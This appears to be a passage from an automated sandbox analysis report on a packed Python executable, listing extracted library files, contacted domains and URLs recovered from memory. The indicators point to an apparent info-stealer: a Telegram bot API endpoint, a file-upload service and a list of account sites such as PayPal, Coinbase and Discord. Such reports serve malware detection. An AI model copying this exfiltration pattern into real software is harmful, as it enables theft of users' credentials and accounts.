            C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingtk.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_webp.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\mfc140u.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin\win32ui.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\VCRUNTIME140.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\VCRUNTIME140_1.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\_asyncio.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\_brotli.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\_bz2.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\_cffi_backend.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\_ctypes.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\_decimal.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\_elementtree.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\_hashlib.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\_lzma.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\_multiprocessing.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\_overlapped.pyd0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ip-api.com
            		208.95.112.1
            		truefalse
              		high
              api.gofile.io
              		45.112.123.126
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://api.gofile.io/serversfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdfmain.exe, 00000002.00000003.1998028650.000001E894BC6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975513124.000001E894BC1000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://www.dabeaz.com/ply)Fmain.exe, 00000002.00000003.1998028650.000001E894BDE000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://api.telegram.org/botmain.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        http://aka.ms/vcpython27main.exe, 00000002.00000002.2026149433.000001E894D70000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          https://github.com/mhammond/pywin32main.exe, 00000000.00000003.1752729643.0000024BCD652000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://coinbase.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              https://stake.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                https://tiktok.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://docs.python.org/library/unittest.htmlmain.exe, 00000002.00000003.1972543562.000001E893395000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://discord.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#main.exe, 00000002.00000003.1981184680.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89151E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2007326260.000001E891541000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E8914FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981184680.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016003137.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977580740.000001E891538000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E891537000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://repository.swisssign.com/3main.exe, 00000002.00000003.1997567755.000001E89391F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983968227.000001E893914000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.opensource.org/licenses/mit-license.phptrolsmain.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://tools.ietf.org/html/rfc2388#section-4.4main.exe, 00000002.00000003.2001802176.000001E894710000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973551416.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976302124.000001E894703000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2005186988.000001E894727000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2023563231.000001E89472A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://crl.securetrust.com/SGCA.crl0tmain.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64main.exe, 00000002.00000003.2008146184.000001E8936B4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787126840.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975698701.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981959975.000001E89369F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787956610.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793761731.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793152862.000001E893A07000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981084453.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982725593.000001E8936B3000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976651882.000001E893693000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981251684.000001E893699000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982367230.000001E8936A6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1789469075.000001E893698000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787609743.000001E893698000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://paypal.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://github.com/pypa/packagingmain.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.opensource.org/licenses/mit-license.phpmain.exe, 00000002.00000003.1976534572.000001E894A92000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012511330.000001E894A99000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2025190061.000001E894A9C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://stackoverflow.com/questions/19622133/main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://riotgames.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://refspecs.linuxfoundation.org/elf/gabi4main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://xbox.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963main.exe, 00000002.00000002.2026373448.000001E894F70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://youtube.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://docs.python.org/3/library/subprocess#subprocess.Popen.killmain.exe, 00000002.00000002.2026373448.000001E894F70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://tools.ietf.org/html/rfc3610main.exe, 00000002.00000003.1997906839.000001E894A82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004907277.000001E8947DB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2006977893.000001E8947E4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024203636.000001E8947E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://peps.python.org/pep-0205/main.exe, 00000002.00000002.2017333313.000001E8933F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1780566116.000001E89356F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1779749185.000001E89356F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://crl.dhimyotis.com/certignarootca.crlmain.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E8947EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://curl.haxx.se/rfc/cookie_spec.htmlmain.exe, 00000002.00000002.2026739710.000001E895170000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://ocsp.accv.esmain.exe, 00000002.00000003.1984796584.000001E89393F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1983914625.000001E89392F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986673226.000001E89394D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979828277.000001E89392A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://docs.python.org/3/library/subprocess#subprocess.Popen.returncodemain.exe, 00000002.00000002.2026373448.000001E894F70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://api.telegram.org/botpmain.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamemain.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxymain.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://docs.python.org/3/library/pprint.htmlmain.exe, 00000002.00000003.1979666103.000001E8939E9000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993956147.000001E8939F8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1982059163.000001E8939EE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1987528082.000001E8939F6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984054418.000001E8939EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016084978.000001E892E48000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://httpbin.org/getmain.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975055524.000001E893BBE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020621648.000001E893BD0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1997639786.000001E893BD0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2013542756.000001E894850000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974563806.000001E893BAF000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985699146.000001E89484B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1979857009.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976823794.000001E894815000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2024088246.000001E8947D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://amazon.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://crunchyroll.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://exiv2.org/tags.html)main.exe, 00000002.00000003.1981902344.000001E894A89000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1992755022.000001E894A89000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1973472828.000001E894A88000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972587068.000001E894A80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://github.com/python-pillow/Pillow/main.exe, 00000002.00000002.2027115983.000001E895370000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-accessmain.exe, 00000002.00000003.1785741511.000001E8939DA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787126840.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981338350.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1787956610.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1793152862.000001E893A07000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984238904.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1978563125.000001E893A0C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012124595.000001E893A11000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1998205963.000001E893A0D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1785741511.000001E893A11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codemain.exe, 00000002.00000002.2016477772.000001E8930F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://wwww.certigna.fr/autorites/0mmain.exe, 00000002.00000003.1976823794.000001E8947EA000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972023696.000001E8947B2000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1989712594.000001E8947EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readermain.exe, 00000002.00000003.1981184680.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89151E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2007326260.000001E891541000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E8914FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981184680.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016003137.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977580740.000001E891538000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777434520.000001E89154A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E891537000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://github.com/python/cpython/issues/86361.main.exe, 00000002.00000003.1781941357.000001E8933CD000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1975282383.000001E893359000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977491655.000001E89338A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1781656560.000001E893672000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://mail.python.org/pipermail/python-dev/2012-June/120787.html.main.exe, 00000002.00000002.2026890228.000001E895270000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://ebay.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://httpbin.org/main.exe, 00000002.00000003.1993083249.000001E893984000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://wwww.certigna.fr/autorites/main.exe, 00000002.00000002.2024904909.000001E894A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984378367.000001E8949FB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1971942361.000001E8949D7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984162933.000001E8949D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://repository.swisssign.com/pmain.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlmain.exe, 00000002.00000003.1785741511.000001E89399B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1785741511.000001E893A11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_modulemain.exe, 00000002.00000002.2016477772.000001E8930F0000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesmain.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://palletsprojects.com/donatemain.exe, 00000000.00000003.1749197199.0000024BCD655000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://playstation.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980605217.000001E894618000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_symain.exe, 00000002.00000003.1981184680.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89151E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1777412725.000001E8932F1000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002902179.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2007326260.000001E891541000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E891539000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977180304.000001E8914FE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981184680.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778874019.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2016003137.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977580740.000001E891538000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1986258490.000001E89154C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1778754123.000001E891537000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976737823.000001E8914E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://repository.swisssign.com/zmain.exe, 00000002.00000003.1994749135.000001E8938F4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2014252012.000001E893905000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2019046082.000001E89390D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://sellix.io)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://disney.com)main.exe, 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://docs.python.org/3/library/multiprocessing.htmlmain.exe, 00000002.00000003.1975331009.000001E893501000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1980293973.000001E893502000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://docs.python.org/3/library/re.htmlmain.exe, 00000002.00000003.1796280845.000001E893C26000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1981338350.000001E893A01000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1993956147.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1974979765.000001E8939E5000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022190852.000001E894370000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000003.1976909466.000001E8935C6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1984238904.000001E893A04000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2020045883.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012429799.000001E893A03000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1996321903.000001E893968000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2001043628.000001E8935FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://github.com/pypa/packaging02d2main.exe, 00000002.00000002.2022075360.000001E894270000.00000004.00001000.00020000.00000000.sdmp, main.exe, 00000002.00000002.2021561908.000001E893EF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://github.com/ActiveState/appdirsmain.exe, 00000002.00000002.2021431524.000001E893DF0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://wiki.debian.org/XDGBaseDirectorySpecification#statemain.exe, 00000002.00000003.1975924116.000001E893326000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2008458443.000001E89334A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2012911590.000001E89334C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1985986835.000001E89334A000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1977459782.000001E893349000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://crl.securetrust.com/STCA.crlmain.exe, 00000002.00000003.2004789935.000001E8938FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://wwwsearch.sf.net/):main.exe, 00000002.00000003.1971266295.000001E894600000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1972288327.000001E89460F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000002.2022722269.000001E894613000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.2002779411.000001E894613000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000002.00000003.1999364287.000001E894613000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
